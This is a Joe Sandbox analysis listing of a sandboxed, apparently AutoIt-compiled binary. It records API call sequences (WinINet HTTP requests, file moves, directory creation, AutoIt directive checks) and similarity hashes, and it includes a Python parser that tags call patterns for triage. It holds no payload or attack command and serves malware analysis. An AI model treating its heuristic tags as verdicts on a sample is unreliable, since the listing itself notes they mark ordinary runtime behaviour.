• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
• Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 0$2
                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                    APIs
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                    • String ID: crts
                                                                                                                    • API String ID: 586820018-3724388283
                                                                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                    • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                    • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                    • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
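The records above share one layout: an `APIs` list of `Name.MODULE(args), ref: <addr>` calls, some attributed to a callee via `Part of subcall function <addr>:`, followed by the `Similarity` fields (`API ID`, `String ID` with `$` separating strings, `API String ID`). The strings `#requireadmin`, `#notrayicon` and `#OnAutoItStartRegister` in the block just above are AutoIt script directives, so the function that compares against them belongs to an AutoIt runtime's directive parser. The following parser is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it runs over an excerpt constructed from the three preceding blocks (the directory-creation helper, the directive parser and the `MoveFileW`/`SHFileOperationW` function), keeps the subcall attribution, and applies three heuristic tags whose names and rules are this example's own assumptions. It does not reproduce how Joe Sandbox derives `API ID` or `String ID`.

```python
"""Parse Joe Sandbox function-listing blocks and tag notable API sequences.

Added example; the record layout is inferred from the listing on this page,
the regexes and tag names are this example's own assumptions.
"""
import re
from typing import Dict, List

# Constructed excerpt: three blocks copied from this page's listing
# (indentation trimmed, hash fields dropped) so the parser runs offline.
REPORT_EXCERPT = """\
APIs
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \\
• API String ID: 321622961-2967466578
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \\*.*
• API String ID: 2326526234-1173974218
"""

# One call line: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE, optional "(args)", then "ref: <addr>" (comma optional).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID):\s*(?P<val>.*)$")

# AutoIt script directives; a comparison against them is the runtime's directive parser.
AUTOIT_DIRECTIVES = {"#requireadmin", "#notrayicon", "#OnAutoItStartRegister"}


def parse_blocks(text: str) -> List[Dict]:
    """Split the listing at each 'APIs' header; collect calls and Similarity fields."""
    blocks: List[Dict] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"apis": [], "api_id": "", "strings": [], "api_string_id": ()}
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current["apis"].append({"name": m["name"], "module": m["module"],
                                    "args": m["args"], "ref": m["ref"], "subcall": m["sub"]})
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] == "API ID":
            current["api_id"] = f["val"]
        elif f and f["key"] == "String ID":
            current["strings"] = f["val"].split("$")  # '$' separates strings in this field
        elif f and f["key"] == "API String ID":
            current["api_string_id"] = tuple(f["val"].split("-"))
    return blocks


def tag_block(block: Dict) -> set:
    """Heuristic tags over one block (names are this example's own, not Joe Sandbox's)."""
    names = {a["name"] for a in block["apis"]}
    tags = set()
    if AUTOIT_DIRECTIVES & set(block["strings"]):
        tags.add("autoit-directive")
    # Probe, create, split the path at the last separator, create again: a
    # "create parent directories" helper (the Win32 shape of mkdir -p).
    if {"GetFileAttributesW", "CreateDirectoryW", "_wcsrchr"} <= names:
        tags.add("recursive-mkdir")
    # Rename first, fall back to a shell file operation (used for wildcard move/delete).
    if {"MoveFileW", "SHFileOperationW"} <= names:
        tags.add("file-move-or-delete")
    return tags


def analyze(text: str) -> List[Dict]:
    blocks = parse_blocks(text)
    for b in blocks:
        b["tags"] = tag_block(b)
    return blocks


if __name__ == "__main__":
    for i, b in enumerate(analyze(REPORT_EXCERPT)):
        calls = " -> ".join(a["name"] for a in b["apis"])
        print(f"block {i}: tags={sorted(b['tags'])} api_string_id={b['api_string_id']}")
        print(f"  calls: {calls or '(none)'}")
```

The tags are triage hints over call sets, not verdicts: `recursive-mkdir` and `file-move-or-delete` describe ordinary library behaviour that any AutoIt runtime carries, so what they establish is where to look in the disassembly, and the `Part of subcall function` attribution tells you which callee actually made the second `CreateDirectoryW` call.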
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                    • _wprintf.LIBCMT ref: 004340A1
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                    • __lock.LIBCMT ref: 00417981
                                                                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                    • __lock.LIBCMT ref: 004179A2
                                                                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                    • String ID: KERNEL32.DLL$pI
                                                                                                                    • API String ID: 637971194-197072765
                                                                                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1938898002-0
                                                                                                                    • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                    • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                    • _memmove.LIBCMT ref: 0044B555
                                                                                                                    • _memmove.LIBCMT ref: 0044B578
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
